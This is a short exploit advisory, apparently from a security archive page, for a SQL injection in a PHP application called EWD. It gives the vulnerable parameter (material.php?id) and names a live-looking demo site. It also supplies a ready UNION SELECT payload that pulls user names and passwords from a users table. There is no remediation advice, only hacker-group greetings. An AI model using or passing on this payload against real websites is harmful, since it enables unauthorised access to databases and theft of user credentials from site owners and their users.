EWD SQL Injection

2012.01.22
Credit: skote_vahshat
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=| |* ______ ____ __ __ | |* /\__ _\/\ _`\ /\ \/\ \ | |* \/_/\ \/\ \ \L\ \\ \ \_\ \ { Turki$ hackers } | |* \ \ \ \ \ _ <'\ \ _ \ | |* \ \ \ \ \ \L\ \\ \ \ \ \ | |* \ \_\ \ \____/ \ \_\ \_\ | |* \/_/ \/___/ \/_/\/_/ | |* | |* | |=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=| ======================================================================= \* [Title] :[EWD sql injection vulnerability] /* \* [Author] :[skote_vahshat] /* \* [Home] :[Http://turk-bh.ir] /* \* [Email] :[skote.vahshat@Gmail.Com] /* ======================================================================= /*Powered-by: php /* [+]Exploit : /* http://www.target.com/material.php?id=[SQLi] /* [+]Demo: /* http://www.thecompletepianist.com/material.php?id=[SQLi] /* /* /*[+] table => users /* /*[+] column => name + password /* /* /*[+] injection /* http://www.thecompletepianist.com/material.php?id=-18+union+select+1,2,name,4,password,6,7,8+from+users /* /* ======================================================================= |_***_| bl4ck.viper ,Turk_server , hellboy , netqurd , and all hacker| |_***_| spical thanks : turk-bh.ir members all turkiS hackers | =======================================================================

References:

http://turk-bh.ir


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top